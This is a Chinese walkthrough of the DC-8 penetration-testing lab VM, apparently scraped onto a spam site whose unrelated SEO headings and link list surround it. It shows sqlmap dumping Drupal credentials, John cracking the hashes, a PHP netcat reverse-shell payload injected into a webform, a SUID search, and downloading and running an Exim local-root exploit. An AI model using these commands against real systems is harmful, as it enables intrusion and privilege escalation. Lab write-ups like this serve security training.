当前位置: 首页 > news >正文

汪峰做的音乐网站百度指数名词解释

汪峰做的音乐网站,百度指数名词解释,长沙优化网站厂家,石家庄青园网站建设期末倒计时一周,发完这篇就要好好复习期末了,【许愿】 1.信息查询 1.1.Ip arp-scan -l 192.168.220.138 1.2.扫描端口 nmap -T4 -A -p- 192.168.220.138 接下来直接访问当前的主机,发现地址栏中的 nid 会发生变化,猜测可…

期末倒计时一周,发完这篇就要好好复习期末了,【许愿】

1.信息查询

1.1.Ip

arp-scan  -l

192.168.220.138

1.2.扫描端口

nmap -T4  -A  -p-  192.168.220.138

接下来直接访问当前的主机,发现地址栏中的 nid 会发生变化,猜测可能会存在 sql 注入漏洞

验证一下 sql 注入是否真的存在,随机给一个不存在的值 x,观察是否会报 sql 的错误信息,如果报了,说明存在 sql 注入

接下来就可以直接使用 sqlmap 进行攻击

sqlmap  -u  "http://192.168.220.138/?nid=1"  --current-db

sqlmap  -u  "http://192.168.220.138/?nid=1"  -D 'd7db'  --tables

获取当前数据库中的所有表,我们想要查看用户的信息可以进行登录,需要使用 users 表

sqlmap  -u  "http://192.168.220.138/?nid=1"  -D 'd7db'  -T 'users' --columns

获取出当前 users 表的字段,接下来获取值

sqlmap  -u  "http://192.168.220.138/?nid=1"  -D 'd7db'  -T 'users' -C 'name,pass'  --dump

获取当前的密码,但是密码加密了,接下来需使用 john --show 查看解密

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

vim dc8.txt

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

写进去然后保存

爆破密码

john dc8.txt

爆破出来的密码: turtle

可以尝试远程连接,但是不好使

1.3.扫描目录

dirsearch -u 192.168.220.138 -e* -i 200

发现了有/user/login 这个页面,接下来就直接访问,使用上面账号进行登录,发现只有 john 能登录成功

接下来需要找突破口,在 webform 中有新的发现

2. shell 反弹

选择 form setting,然后写入 shell 反弹脚本

<h1>xxxx</h1><?phpsystem("nc -e /bin/bash 192.168.126.138 7777");?>

注意选php

点击保存

然后需要写一些信息来进行提交

反弹成功,并设置python交互

使用 python 命令行脚本

python -c 'import pty;pty.spawn("/bin/bash")'

    3.提权

    然后接下来要做两件事情

    1. 进入到 home 目录,发现无任何价值信息

    2.sudo -l进行提权,发现不好使,接下来使用 suid 方式进行提权

    find / -user root -perm -u=s 2>/dev/null

    发现 exim4 在使用时具有 root 权限

    exim 是一个邮件传输的代理,用于在电子邮件服务器之间进行邮件交换和路由。

    4.发现exim的提权方式

    查看 exim4 的版本

    exim4  --version

    可以搜索这个版本的漏洞

    searchsploit exim

    搜索 46996 这个文件

    searchsploit  -p    linux/local/46996.sh

    接下来复制一份到本地,然后传递到靶机上

    cp  /usr/share/exploitdb/exploits/linux/local/46996.sh   46996.sh

    搭建 python 的服务器,用户传递数据

    python3  -m  http.server 8888

    搭建 python 的服务器,用户传递数据

    python3  -m  http.server 8888

    在靶机中先切换到/tmp.然后在进行 sh 文件的下载

    查看一下自己虚拟机的ip

    192.168.220.146

    ​
    cd  /tmpwget http://192.168.220.146:8888/46996.sh​

    给当前脚本一个执行权限

    chmod  777  46996.sh

    查看这个脚本内容,发现有两种提权方式

    ./46996.sh -m  netcat

    最后

    cd  /rootlscat flag.txt

    http://www.hkea.cn/news/991548/

    相关文章:

  1. 网络营销网站建设实训网络营销步骤
  2. 网站都有后台吗百度竞价开户公司
  3. 秭归网站建设网站seo优化心得
  4. wordpress电影网站模板seo运营
  5. 公司注册网上核名业务如何终止网站排名优化怎么做
  6. 网站建设伍金手指下拉2网上推广平台
  7. 沧州网站建设公司翼马爱情链接
  8. 计算机学了出来干嘛免费优化推广网站的软件
  9. 宁波网站建设优化湖南seo优化按天付费
  10. 门户网站手机版google官网入口
  11. 深圳市工程建设交易服务中心网站软文什么意思
  12. 大型网架加工厂成都网站建设方案优化
  13. 导航网站的广告怎么做的千锋教育官方网
  14. etc网站开发票网站制作软件免费下载
  15. 上海seo网站设计2022十大网络营销案例
  16. 还有做网站的必要吗网站运营推广方案
  17. 企业营销型网站建设厂家品牌搜索引擎服务优化
  18. 学校网站建设计划怎么成为百度推广代理商
  19. 普陀网站开发培训学校seo快速优化
  20. 建一个商城网站多少钱免费的网站推广软件
  21. 手机网站解决方案看网站搜什么关键词
  22. 顺企网江西网站建设宜昌今日头条新闻
  23. 坪山网站建设行业现状网页设计与制作代码成品
  24. 网站建设需求文档模板下载学大教育一对一收费价格表
  25. 小型网站怎样优化百度首页官网
  26. 网站开发与iso9001关系百度上做推广怎么做
  27. wordpress怎么设置导航镇江seo
  28. 番禺建设网站服务软文写作网站
  29. 有哪些专做自然风景图片的网站石首seo排名
  30. 移动网站虚拟主机seo 排名 优化